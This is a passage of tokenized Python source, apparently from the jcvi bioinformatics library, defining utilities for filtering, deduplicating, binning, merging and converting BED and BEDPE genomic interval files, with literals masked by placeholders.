"<STR_LIT:w>" ) <EOL> for row in fp : <EOL> r = BedpeLine ( row ) <EOL> print >> fw , r . bedline <EOL> fw . close ( ) <EOL> merged = converted + "<STR_LIT>" <EOL> if need_update ( converted , merged ) : <EOL> mergeBed ( converted ) <EOL> def sfa_to_fq ( sfa , qvchar ) : <EOL> fq = sfa . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> fp = must_open ( sfa ) <EOL> fw = must_open ( fq , "<STR_LIT:w>" ) <EOL> total = <NUM_LIT:0> <EOL> for row in fp : <EOL> total += <NUM_LIT:1> <EOL> name , seq = row . split ( ) <EOL> qual = len ( seq ) * qvchar <EOL> print >> fw , "<STR_LIT:\n>" . join ( ( "<STR_LIT:@>" + name , seq , "<STR_LIT:+>" , qual ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( total , fq ) ) <EOL> return fq <EOL> def filter_bedpe ( bedpe , filtered , ref , rc = False , rlen = None , <EOL> minlen = <NUM_LIT> , maxlen = <NUM_LIT> ) : <EOL> tag = "<STR_LIT>" if rc else "<STR_LIT>" <EOL> logging . debug ( "<STR_LIT>" . format ( tag , minlen , maxlen ) ) <EOL> sizes = Sizes ( ref ) . mapping <EOL> fp = must_open ( bedpe ) <EOL> fw = must_open ( filtered , "<STR_LIT:w>" ) <EOL> retained = total = <NUM_LIT:0> <EOL> for row in fp : <EOL> b = BedpeLine ( row ) <EOL> total += <NUM_LIT:1> <EOL> if rc : <EOL> b . rc ( ) <EOL> if not b . is_innie : <EOL> continue <EOL> b . score = b . outerdist <EOL> if not minlen <= b . score <= maxlen : <EOL> continue <EOL> retained += <NUM_LIT:1> <EOL> if rlen : <EOL> b . extend ( rlen , sizes [ b . seqid1 ] ) <EOL> print >> fw , b <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( retained , total ) , filtered ) ) <EOL> fw . close ( ) <EOL> def rmdup_bedpe ( filtered , rmdup , dupwiggle = <NUM_LIT:10> ) : <EOL> sortedfiltered = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , sortedfiltered ) : <EOL> sh ( "<STR_LIT>" . format ( filtered , sortedfiltered ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( dupwiggle ) ) <EOL> fp = must_open ( sortedfiltered ) <EOL> fw = must_open ( rmdup , "<STR_LIT:w>" ) <EOL> data = [ BedpeLine ( x ) for x in fp ] <EOL> retained = total = <NUM_LIT:0> <EOL> for seqid , ss in groupby ( data , key = lambda x : x . seqid1 ) : <EOL> ss = list ( ss ) <EOL> for i , a in enumerate ( ss ) : <EOL> if a . isdup : <EOL> continue <EOL> for b in ss [ i + <NUM_LIT:1> : ] : <EOL> if b . start1 > a . start1 + dupwiggle : <EOL> break <EOL> if b . isdup : <EOL> continue <EOL> if a . seqid2 == b . seqid2 and a . start2 - dupwiggle <= b . start2 <= a . start2 + dupwiggle : <EOL> b . isdup = True <EOL> for a in ss : <EOL> total += <NUM_LIT:1> <EOL> if a . isdup : <EOL> continue <EOL> retained += <NUM_LIT:1> <EOL> print >> fw , a <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( retained , total ) , rmdup ) ) <EOL> fw . close ( ) <EOL> def alignextend ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( alignextend . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:100> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_bedpe ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedpe , ref = args <EOL> qvchar = chr ( opts . qv + <NUM_LIT> ) <EOL> pf = bedpe . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> filtered = bedpe + "<STR_LIT>" <EOL> if need_update ( bedpe , filtered ) : <EOL> filter_bedpe ( bedpe , filtered , ref , rc = opts . rc , <EOL> minlen = opts . minlen , maxlen = opts . maxlen , rlen = opts . rlen ) <EOL> rmdup = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , rmdup ) : <EOL> rmdup_bedpe ( filtered , rmdup , dupwiggle = opts . dup ) <EOL> if opts . bedonly : <EOL> return <EOL> bed1 , bed2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( rmdup , ( bed1 , bed2 ) ) : <EOL> sh ( "<STR_LIT>" . format ( rmdup ) , outfile = bed1 ) <EOL> sh ( "<STR_LIT>" . format ( rmdup ) , outfile = bed2 ) <EOL> sfa1 , sfa2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( ( bed1 , bed2 , ref ) , ( sfa1 , sfa2 ) ) : <EOL> for bed in ( bed1 , bed2 ) : <EOL> fastaFromBed ( bed , ref , name = True , tab = True , stranded = True ) <EOL> fq1 , fq2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( ( sfa1 , sfa2 ) , ( fq1 , fq2 ) ) : <EOL> for sfa in ( sfa1 , sfa2 ) : <EOL> sfa_to_fq ( sfa , qvchar ) <EOL> def seqids ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( seqids . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:100> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> pf = opts . prefix <EOL> exclude = opts . exclude <EOL> bed = Bed ( bedfile ) <EOL> s = bed . seqids <EOL> if pf : <EOL> s = [ x for x in s if x . startswith ( pf ) ] <EOL> if exclude : <EOL> s = [ x for x in s if not exclude in x ] <EOL> s = s [ : opts . maxn ] <EOL> print "<STR_LIT:U+002C>" . join ( s ) <EOL> def juncs ( args ) : <EOL> """<STR_LIT>""" <EOL> from tempfile import mkstemp <EOL> from pybedtools import BedTool <EOL> p = OptionParser ( juncs . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> fh , trimbed = mkstemp ( suffix = "<STR_LIT>" ) <EOL> fw = must_open ( trimbed , "<STR_LIT:w>" ) <EOL> for i , juncbed in enumerate ( args ) : <EOL> bed = Bed ( juncbed , juncs = True ) <EOL> for b in bed : <EOL> ovh = [ int ( x ) for x in b . extra [ - <NUM_LIT:2> ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> b . start += ovh [ <NUM_LIT:0> ] <EOL> b . end -= ovh [ <NUM_LIT:1> ] <EOL> b . accn = "<STR_LIT>" . format ( b . accn , i ) <EOL> b . extra = None <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> sh ( "<STR_LIT>" . format ( trimbed ) ) <EOL> tbed = BedTool ( trimbed ) <EOL> grouptbed = tbed . groupby ( g = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:6> ] , c = <NUM_LIT:5> , ops = [ '<STR_LIT>' ] ) <EOL> cmd = """<STR_LIT>""" <EOL> infile = grouptbed . fn <EOL> sh ( cmd , infile = infile , outfile = opts . outfile ) <EOL> else : <EOL> sort ( [ trimbed , "<STR_LIT>" , opts . outfile ] ) <EOL> os . unlink ( trimbed ) <EOL> def random ( args ) : <EOL> """<STR_LIT>""" <EOL> from random import sample <EOL> from jcvi . formats . base import flexible_cast <EOL> p = OptionParser ( random . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , N = args <EOL> assert is_number ( N ) <EOL> b = Bed ( bedfile ) <EOL> NN = flexible_cast ( N ) <EOL> if NN < <NUM_LIT:1> : <EOL> NN = int ( round ( NN * len ( b ) ) ) <EOL> beds = sample ( b , NN ) <EOL> new_bed = Bed ( ) <EOL> new_bed . extend ( beds ) <EOL> outfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" . format ( N ) <EOL> new_bed . print_to_file ( outfile ) <EOL> logging . debug ( "<STR_LIT>" . format ( NN , outfile ) ) <EOL> def filter ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( filter . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> fp = must_open ( bedfile ) <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> minsize , maxsize = opts . minsize , opts . maxsize <EOL> minaccn = opts . minaccn <EOL> minscore = opts . minscore <EOL> total = [ ] <EOL> keep = [ ] <EOL> for row in fp : <EOL> try : <EOL> b = BedLine ( row ) <EOL> except IndexError : <EOL> print >> fw , row . strip ( ) <EOL> continue <EOL> span = b . span <EOL> total . append ( span ) <EOL> if not minsize <= span <= maxsize : <EOL> continue <EOL> if minaccn and int ( b . accn ) < minaccn : <EOL> continue <EOL> if minscore and int ( b . score ) < minscore : <EOL> continue <EOL> print >> fw , b <EOL> keep . append ( span ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( len ( keep ) , len ( total ) ) ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( sum ( keep ) , sum ( total ) ) ) ) <EOL> def make_bedgraph ( bedfile , fastafile ) : <EOL> sizesfile = Sizes ( fastafile ) . filename <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> bedfile = sort ( [ bedfile ] ) <EOL> bedgraph = pf + "<STR_LIT>" <EOL> if need_update ( bedfile , bedgraph ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile , sizesfile ) <EOL> sh ( cmd , outfile = bedgraph ) <EOL> return bedgraph <EOL> def mergebydepth ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( mergebydepth . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:3> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> mindepth = opts . mindepth <EOL> bedgraph = make_bedgraph ( bedfile ) <EOL> bedgraphfiltered = bedgraph + "<STR_LIT>" . format ( mindepth ) <EOL> if need_update ( bedgraph , bedgraphfiltered ) : <EOL> filter ( [ bedgraph , "<STR_LIT>" . format ( mindepth ) , <EOL> "<STR_LIT>" . format ( bedgraphfiltered ) ] ) <EOL> merged = bedgraphfiltered + "<STR_LIT>" <EOL> if need_update ( bedgraphfiltered , merged ) : <EOL> mergeBed ( bedgraphfiltered , sorted = True ) <EOL> def depth ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( depth . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> readsbed , featsbed = args <EOL> fp = open ( featsbed ) <EOL> nargs = len ( fp . readline ( ) . split ( "<STR_LIT:\t>" ) ) <EOL> keepcols = "<STR_LIT:U+002C>" . join ( str ( x ) for x in range ( <NUM_LIT:1> , nargs + <NUM_LIT:1> ) ) <EOL> cmd = "<STR_LIT>" . format ( readsbed , featsbed ) <EOL> cmd += "<STR_LIT>" . format ( keepcols , nargs + <NUM_LIT:2> ) <EOL> sh ( cmd , outfile = opts . outfile ) <EOL> def remove_isoforms ( ids ) : <EOL> """<STR_LIT>""" <EOL> key = lambda x : x . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> iso_number = lambda x : get_number ( x . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] ) <EOL> ids = sorted ( ids , key = key ) <EOL> newids = [ ] <EOL> for k , ii in groupby ( ids , key = key ) : <EOL> min_i = min ( list ( ii ) , key = iso_number ) <EOL> newids . append ( min_i ) <EOL> return newids <EOL> def longest ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( longest . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> maxsize = opts . maxsize <EOL> minsize = opts . minsize <EOL> prec = opts . precedence <EOL> mergedbed = mergeBed ( bedfile , nms = True ) <EOL> sizes = Sizes ( fastafile ) . mapping <EOL> bed = Bed ( mergedbed ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> ids = set ( ) <EOL> for b in bed : <EOL> accns = b . accn . split ( "<STR_LIT:;>" ) <EOL> prec_accns = [ x for x in accns if x . startswith ( prec ) ] <EOL> if prec_accns : <EOL> accns = prec_accns <EOL> accn_sizes = [ ( sizes . get ( x , <NUM_LIT:0> ) , x ) for x in accns ] <EOL> accn_sizes = [ ( size , x ) for size , x in accn_sizes if size < maxsize ] <EOL> if not accn_sizes : <EOL> continue <EOL> max_size , max_accn = max ( accn_sizes ) <EOL> if max_size < minsize : <EOL> continue <EOL> ids . add ( max_accn ) <EOL> newids = remove_isoforms ( ids ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( ids ) , len ( newids ) ) ) <EOL> longestidsfile = pf + "<STR_LIT>" <EOL> fw = open ( longestidsfile , "<STR_LIT:w>" ) <EOL> print >> fw , "<STR_LIT:\n>" . join ( newids ) <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( newids ) , longestidsfile ) ) <EOL> longestbedfile = pf + "<STR_LIT>" <EOL> some ( [ bedfile , longestidsfile , "<STR_LIT>" . format ( longestbedfile ) , <EOL> "<STR_LIT>" ] ) <EOL> def merge ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( merge . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfiles = args <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> for bedfile in bedfiles : <EOL> bed = Bed ( bedfile ) <EOL> pf = op . basename ( bedfile ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> for b in bed : <EOL> b . seqid = "<STR_LIT:_>" . join ( ( pf , b . seqid ) ) <EOL> print >> fw , b <EOL> def fix ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( fix . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> minspan = opts . minspan <EOL> fp = open ( bedfile ) <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> nfixed = nfiltered = ntotal = <NUM_LIT:0> <EOL> for row in fp : <EOL> atoms = row . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> assert len ( atoms ) >= <NUM_LIT:3> , "<STR_LIT>" <EOL> seqid , start , end = atoms [ : <NUM_LIT:3> ] <EOL> start , end = int ( start ) , int ( end ) <EOL> orientation = '<STR_LIT:+>' <EOL> if start > end : <EOL> start , end = end , start <EOL> orientation = '<STR_LIT:->' <EOL> nfixed += <NUM_LIT:1> <EOL> atoms [ <NUM_LIT:1> : <NUM_LIT:3> ] = [ str ( start ) , str ( end ) ] <EOL> if len ( atoms ) > <NUM_LIT:6> : <EOL> atoms [ <NUM_LIT:6> ] = orientation <EOL> line = "<STR_LIT:\t>" . join ( atoms ) <EOL> b = BedLine ( line ) <EOL> if b . span >= minspan : <EOL> print >> fw , b <EOL> nfiltered += <NUM_LIT:1> <EOL> ntotal += <NUM_LIT:1> <EOL> if nfixed : <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nfixed , ntotal ) ) ) <EOL> if nfiltered : <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nfiltered , ntotal ) ) ) <EOL> def some ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . base import SetFile <EOL> from jcvi . utils . cbook import gene_name <EOL> p = OptionParser ( some . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> p . set_stripnames ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , idsfile = args <EOL> inverse = opts . inverse <EOL> ostrip = opts . strip_names <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> ids = SetFile ( idsfile ) <EOL> if ostrip : <EOL> ids = set ( gene_name ( x ) for x in ids ) <EOL> bed = Bed ( bedfile ) <EOL> ntotal = nkeep = <NUM_LIT:0> <EOL> for b in bed : <EOL> ntotal += <NUM_LIT:1> <EOL> keep = b . accn in ids <EOL> if inverse : <EOL> keep = not keep <EOL> if keep : <EOL> nkeep += <NUM_LIT:1> <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nkeep , ntotal ) ) ) <EOL> def uniq ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( uniq . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> uniqbedfile = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> bed = Bed ( bedfile ) <EOL> if opts . sizes : <EOL> sizes = Sizes ( opts . sizes ) . mapping <EOL> ranges = [ Range ( x . seqid , x . start , x . end , sizes [ x . accn ] , i ) for i , x in enumerate ( bed ) ] <EOL> else : <EOL> if opts . mode == "<STR_LIT>" : <EOL> ranges = [ Range ( x . seqid , x . start , x . end , x . end - x . start + <NUM_LIT:1> , i ) for i , x in enumerate ( bed ) ] <EOL> else : <EOL> ranges = [ Range ( x . seqid , x . start , x . end , float ( x . score ) , i ) for i , x in enumerate ( bed ) ] <EOL> selected , score = range_chain ( ranges ) <EOL> selected = [ x . id for x in selected ] <EOL> selected_ids = set ( selected ) <EOL> selected = [ bed [ x ] for x in selected ] <EOL> notselected = [ x for i , x in enumerate ( bed ) if i not in selected_ids ] <EOL> newbed = Bed ( ) <EOL> newbed . extend ( selected ) <EOL> newbed . print_to_file ( uniqbedfile , sorted = True ) <EOL> if notselected : <EOL> leftoverfile = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> leftoverbed = Bed ( ) <EOL> leftoverbed . extend ( notselected ) <EOL> leftoverbed . print_to_file ( leftoverfile , sorted = True ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( bed ) , len ( newbed ) ) ) <EOL> return uniqbedfile <EOL> def subtractbins ( binfile1 , binfile2 ) : <EOL> from jcvi . graphics . landscape import BinFile <EOL> abin = BinFile ( binfile1 ) <EOL> bbin = BinFile ( binfile2 ) <EOL> assert len ( abin ) == len ( bbin ) <EOL> fw = open ( binfile1 , "<STR_LIT:w>" ) <EOL> for a , b in zip ( abin , bbin ) : <EOL> assert a . chr == b . chr <EOL> assert a . binlen == b . binlen <EOL> a . subtract ( b ) <EOL> print >> fw , a <EOL> fw . close ( ) <EOL> return binfile1 <EOL> def bins ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( bins . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT:count>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> subtract = opts . subtract <EOL> mode = opts . mode <EOL> assert op . exists ( bedfile ) , "<STR_LIT>" . format ( bedfile ) <EOL> binsize = opts . binsize <EOL> binfile = bedfile + "<STR_LIT>" . format ( binsize ) <EOL> binfile += "<STR_LIT>" . format ( mode ) <EOL> if not need_update ( bedfile , binfile ) : <EOL> return binfile <EOL> sz = Sizes ( fastafile ) <EOL> sizesfile = sz . filename <EOL> sizes = sz . mapping <EOL> fw = open ( binfile , "<STR_LIT:w>" ) <EOL> scores = "<STR_LIT>" if mode == "<STR_LIT>" else None <EOL> bedfile = mergeBed ( bedfile , nms = True , scores = scores ) <EOL> if subtract : <EOL> subtractmerge = mergeBed ( subtract ) <EOL> subtract_complement = complementBed ( subtractmerge , sizesfile ) <EOL> bedfile = intersectBed ( bedfile , subtract_complement ) <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> bed = Bed ( bedfile ) <EOL> sbdict = dict ( bed . sub_beds ( ) ) <EOL> for chr , chr_len in sorted ( sizes . items ( ) ) : <EOL> chr_len = sizes [ chr ] <EOL> subbeds = sbdict . get ( chr , [ ] ) <EOL> nbins = chr_len / binsize <EOL> last_bin = chr_len % binsize <EOL> if last_bin : <EOL> nbins += <NUM_LIT:1> <EOL> a = np . zeros ( nbins ) <EOL> b = np . zeros ( nbins , dtype = "<STR_LIT:int>" ) <EOL> c = np . zeros ( nbins , dtype = "<STR_LIT:int>" ) <EOL> b [ : - <NUM_LIT:1> ] = binsize <EOL> b [ - <NUM_LIT:1> ] = last_bin <EOL> for bb in subbeds : <EOL> start , end = bb . start , bb . end <EOL> startbin = start / binsize <EOL> endbin = end / binsize <EOL> assert startbin <= endbin <EOL> c [ startbin : endbin + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if mode == "<STR_LIT>" : <EOL> a [ startbin : endbin + <NUM_LIT:1> ] += float ( bb . score ) <EOL> elif mode == "<STR_LIT>" : <EOL> if startbin == endbin : <EOL> a [ startbin ] += end - start + <NUM_LIT:1> <EOL> if startbin < endbin : <EOL> firstsize = ( startbin + <NUM_LIT:1> ) * binsize - start + <NUM_LIT:1> <EOL> lastsize = end - endbin * binsize <EOL> a [ startbin ] += firstsize <EOL> if startbin + <NUM_LIT:1> < endbin : <EOL> a [ startbin + <NUM_LIT:1> : endbin ] += binsize <EOL> a [ endbin ] += lastsize <EOL> if mode == "<STR_LIT:count>" : <EOL> a = c <EOL> for xa , xb in zip ( a , b ) : <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( chr , xa , xb ) ) <EOL> fw . close ( ) <EOL> if subtract : <EOL> subtractbinfile = bins ( [ subtract , fastafile , "<STR_LIT>" . format ( binsize ) ] ) <EOL> binfile = subtractbins ( binfile , subtractbinfile ) <EOL> return binfile <EOL> def pile ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . utils . grouper import Grouper <EOL> p = OptionParser ( pile . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> abedfile , bbedfile = args <EOL> iw = intersectBed_wao ( abedfile , bbedfile , minOverlap = opts . minOverlap ) <EOL> groups = Grouper ( ) <EOL> for a , b in iw : <EOL> groups . join ( a . accn , b . accn ) <EOL> ngroups = <NUM_LIT:0> <EOL> for group in groups : <EOL> if len ( group ) > <NUM_LIT:1> : <EOL> ngroups += <NUM_LIT:1> <EOL> print "<STR_LIT:|>" . join ( group ) <EOL> logging . debug ( "<STR_LIT>" . format ( ngroups ) ) <EOL> def index ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( index . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> fastafile = opts . fasta <EOL> if fastafile : <EOL> bedfile = make_bedgraph ( bedfile , fastafile ) <EOL> bedfile = sort ( [ bedfile ] ) <EOL> gzfile = bedfile + "<STR_LIT>" <EOL> if need_update ( bedfile , gzfile ) : <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> sh ( cmd ) <EOL> tbifile = gzfile + "<STR_LIT>" <EOL> if need_update ( gzfile , tbifile ) : <EOL> cmd = "<STR_LIT>" . format ( gzfile ) <EOL> sh ( cmd ) <EOL> query = opts . query <EOL> if not query : <EOL> return <EOL> cmd = "<STR_LIT>" . format ( gzfile , query ) <EOL> sh ( cmd , outfile = opts . outfile ) <EOL> def fastaFromBed ( bedfile , fastafile , name = False , tab = False , stranded = False ) : <EOL> suffix = "<STR_LIT>" if tab else "<STR_LIT>" <EOL> outfile = op . basename ( bedfile ) . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + suffix <EOL> cmd = "<STR_LIT>" . format ( fastafile , bedfile , outfile ) <EOL> if name : <EOL> cmd += "<STR_LIT>" <EOL> if tab : <EOL> cmd += "<STR_LIT>" <EOL> if stranded : <EOL> cmd += "<STR_LIT>" <EOL> if need_update ( [ bedfile , fastafile ] , outfile ) : <EOL> sh ( cmd , outfile = outfile ) <EOL> return outfile <EOL> def mergeBed ( bedfile , d = <NUM_LIT:0> , sorted = False , nms = False , s = False , scores = None , delim = "<STR_LIT:;>" ) : <EOL> if not sorted : <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> if d : <EOL> cmd += "<STR_LIT>" . format ( d ) <EOL> if nms : <EOL> nargs = len ( open ( bedfile ) . readline ( ) . split ( ) ) <EOL> if nargs <= <NUM_LIT:3> : <EOL> logging . debug ( "<STR_LIT>" . format ( nargs ) ) <EOL> else : <EOL> cmd += "<STR_LIT>" <EOL> if s : <EOL> cmd += "<STR_LIT>" <EOL> if scores : <EOL> valid_opts = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not scores in valid_opts : <EOL> scores = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( scores ) <EOL> if delim : <EOL> cmd += '<STR_LIT>' . format ( delim ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] if bedfile . endswith ( "<STR_LIT>" ) else bedfile <EOL> mergebedfile = op . basename ( pf ) + "<STR_LIT>" <EOL> if need_update ( bedfile , mergebedfile ) : <EOL> sh ( cmd , outfile = mergebedfile ) <EOL> return mergebedfile <EOL> def complementBed ( bedfile , sizesfile ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile , sizesfile ) <EOL> complementbedfile = "<STR_LIT>" + op . basename ( bedfile ) <EOL> if need_update ( [ bedfile , sizesfile ] , complementbedfile ) : 